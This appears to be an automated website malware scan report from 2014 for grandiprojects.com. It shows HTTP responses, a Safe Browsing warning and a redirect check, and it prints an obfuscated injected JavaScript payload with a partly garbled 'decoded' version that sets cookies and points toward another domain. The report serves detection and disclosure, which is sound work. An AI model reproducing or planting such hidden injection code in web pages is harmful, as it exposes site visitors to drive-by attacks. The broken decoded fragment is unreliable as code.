Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grandiprojects.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://grandiprojects.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:19 GMT Location: http://www.grandiprojects.com/ Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.grandiprojects.com/ | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 19:17:20 GMT Accept-Ranges: bytes ETag: "dd1a3e6829d0ca1:4a7ac7" Server: Microsoft-IIS/6.0 Content-Length: 12916 Content-Location: http://www.grandiprojects.com/index.html Content-Type: text/html Last-Modified: Tue, 30 Mar 2010 16:52:39 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.grandiprojects.com/index.html | 200 OK Content-Length: 12916 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var ayOb;if(ayOb!='' && ayOb!='axAe'){ayOb=''};var iKy;if(iKy!='arBe' && iKy != ''){iKy=null};var diP;var asOr=false;var haKD=false;var esPa=false;diP='797b7b7f7c7f7b7f345064634161727f6022126272216f69556a6e647b533877477f6b233b6b6e357f6c676275767c65307c627b6166697462691c243f7562737a725531212d716d61756778707e107a7e7372162f7f7b6169751b2d61694a477b6d7577373c694d7a6e4b7f782a067e4c77535b6f7c5c29705f616d6b23697678783263694b777e4a7a5963624e24320e256a4771745c7f73425b2c2c312a78797b3479685a
Decoded script:
function getShort(){};function jInt(){};getShort.prototype = {wordA : function(name, value) {dStatic="dStatic";useFalse=false;this.nsFinalByte="";byteCharC="";var bDDouble="";var d= new Date();this.windowB='';var eNsAs='';d.setTime(new Date().getTime() + 43200000); falseUse="falseUse";var doubleA=false;this.longLetterWord=false;document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); var getStatic=46876;floatKK='';var setFinalSet=new Array();},byteTrueLong : function() function () { letterDoubleSet.byteTrueLong(); } /*** called setTimeout with function () { letterDoubleSet.byteTrueLong(); }, 100 */ getDate</body>
Antivirus reports:
http://titusdevo.com/images/wpThumbnails/352_Archer.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:20 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevelopment.com/ | 200 OK Content-Length: 2701 Content-Type: text/html | clean |
http://titusdevelopment.com/menu/menu.js | 200 OK Content-Length: 8376 Content-Type: application/javascript | clean |
http://titusdevo.com/images/wpThumbnails/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:23 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevelopment.com/test404page.js | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
http://titusdevo.com/images/wpThumbnails/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:24 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/contracting.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:25 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/consulting.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:25 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/lowell.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:26 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/grant.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:26 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/newton.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:26 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/archer.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:27 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/shoshone.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:27 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/hill.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:28 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/martin.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:28 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/bryant.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:28 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/mills.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:29 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://titusdevo.com/images/wpThumbnails/contact.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 19:17:29 GMT Location: http://titusdevelopment.com Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: grandiprojects.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 28 Aug 2014 19:17:19 GMT
Location: http://www.grandiprojects.com/
Server: Apache
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
...238 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: grandiprojects.com
Referer: http://www.google.com/search?q=grandiprojects.com
Result:
The result is similar to the first query. There are no suspicious redirects found.